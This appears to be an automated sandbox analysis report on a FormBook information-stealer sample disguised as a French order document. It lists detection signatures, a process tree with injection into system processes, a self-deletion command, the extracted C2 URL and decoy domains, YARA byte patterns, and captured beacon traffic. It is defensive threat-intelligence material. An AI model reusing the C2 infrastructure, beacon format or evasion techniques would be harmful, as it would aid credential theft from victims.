
Windows Analysis Report: document de commande.scr

Overview

General Information

Sample Name: document de commande.scr (renamed file extension from scr to exe)
Analysis ID: 502021
MD5: 1823dce627d29f5d4985501267f7ad9f
SHA1: 1ce10042fccf2c8fcb2b0a93723f24b6c3b4ffb3
SHA256: c14ba2023f89dc57df157690e40042b8b090906257c59b6e5834b2212cd3142e
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • document de commande.exe (PID: 3116 cmdline: 'C:\Users\user\Desktop\document de commande.exe' MD5: 1823DCE627D29F5D4985501267F7AD9F)
    • document de commande.exe (PID: 6756 cmdline: C:\Users\user\Desktop\document de commande.exe MD5: 1823DCE627D29F5D4985501267F7AD9F)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 5888 cmdline: /c del 'C:\Users\user\Desktop\document de commande.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yourherogarden.net/dn7r/"], "decoy": ["eventphotographerdfw.com", "thehalalcoinstaking.com", "philipfaziofineart.com", "intercoh.com", "gaiaseyephotography.com", "chatbotforrealestate.com", "lovelancemg.com", "marlieskasberger.com", "elcongoenespanol.info", "lepirecredit.com", "distribution-concept.com", "e99game.com", "exit11festival.com", "twodollartoothbrushclub.com", "cocktailsandlawn.com", "performimprove.network", "24horas-telefono-11840.com", "cosmossify.com", "kellenleote.com", "perovskite.energy", "crosschain.services", "xiwanghe.com", "mollycayton.com", "bonipay.com", "uuwyxc.com", "viberiokno-online.com", "mobceo.com", "menzelna.com", "tiffaniefoster.com", "premiumautowesthartford.com", "ownhome.house", "bestmartinshop.com", "splashstoreofficial.com", "guidemining.com", "ecshopdemo.com", "bestprinting1.com", "s-circle2020.com", "ncagency.info", "easydigitalzone.com", "reikiforthecollective.com", "theknottteam.com", "evolvedpixel.com", "japxo.online", "ryansqualityrenovations.com", "dentimagenquito.net", "pantherprints.co.uk", "apoporangi.com", "thietkemietvuon.net", "ifernshop.com", "casaruralesgranada.com", "camp-3saumons.com", "eddsucks.com", "blwcd.com", "deldlab.com", "susanperb.com", "autosanitizingsolutions.com", "femhouse.com", "ironcageclash.com", "thekinghealer.com", "shaghayeghbovand.com", "advertfaces.com", "lonriley.com", "mased-world.online", "mythicspacex.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(24 further memory dump entries are not included in this export)

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.document de commande.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.document de commande.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.document de commande.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17a49:$sqlite3step: 68 34 1C 7B E1
  • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a78:$sqlite3text: 68 38 2A 90 C5
  • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
3.2.document de commande.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.document de commande.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(3 further unpacked PE entries are not included in this export)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: document de commande.exe | Virustotal: Detection: 31%
Source: document de commande.exe | Metadefender: Detection: 22%
Source: document de commande.exe | ReversingLabs: Detection: 50%
Yara detected FormBook
Source: Yara match | File source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORY
Source: 3.2.document de commande.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: document de commande.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: document de commande.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: chkdsk.pdbGCTL | source: document de commande.exe, 00000003.00000002.752978247.0000000001A10000.00000040.00020000.sdmp
Source: Binary string: chkdsk.pdb | source: document de commande.exe, 00000003.00000002.752978247.0000000001A10000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP | source: document de commande.exe, 00000003.00000002.753021342.0000000001A20000.00000040.00000001.sdmp, chkdsk.exe, 00000009.00000002.932346690.00000000051DF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: document de commande.exe, 00000003.00000002.753021342.0000000001A20000.00000040.00000001.sdmp, chkdsk.exe, 00000009.00000002.932346690.00000000051DF000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\document de commande.exe | Code function: 4x nop then jmp 06AF0D4Bh | 0_2_06AF0412
Source: C:\Users\user\Desktop\document de commande.exe | Code function: 4x nop then pop edi | 3_2_00417DBC
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4x nop then pop edi | 9_2_04D77DBC

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.ecshopdemo.com
Source: C:\Windows\explorer.exe | Domain query: www.gaiaseyephotography.com
Source: C:\Windows\explorer.exe | Network Connect: 217.160.0.186 80
Source: C:\Windows\explorer.exe | Domain query: www.casaruralesgranada.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.yourherogarden.net/dn7r/
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: global traffic | HTTP traffic detected: GET /dn7r/?iR-Tzb=13xKs1CRhM6TBkg9XZx8aHv4jtF4dS/6+j4tMM4NOYQaHb7QxT/SxMO9vodW3MT/P4hK&qVV8Aj=6lIHIj6PDtc HTTP/1.1 | Host: www.casaruralesgranada.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Content-Length: 1271 | Connection: close | Date: Wed, 13 Oct 2021 12:28:53 GMT | Server: Apache | X-Frame-Options: deny | Data Raw: [hex dump of the HTML response body removed]
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmp | String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: document de commande.exe, 00000000.00000002.684698712.00000000066E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown | DNS traffic detected: queries for: www.ecshopdemo.com
Source: global traffic | HTTP traffic detected: GET /dn7r/?iR-Tzb=13xKs1CRhM6TBkg9XZx8aHv4jtF4dS/6+j4tMM4NOYQaHb7QxT/SxMO9vodW3MT/P4hK&qVV8Aj=6lIHIj6PDtc HTTP/1.1 | Host: www.casaruralesgranada.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | same file sources as listed for "Yara detected FormBook" under AV Detection above

System Summary:

Malicious sample detected (through community Yara rule)
Source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: document de commande.exe
Source: document de commande.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 0_2_002266FF0_2_002266FF
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 0_2_002243510_2_00224351
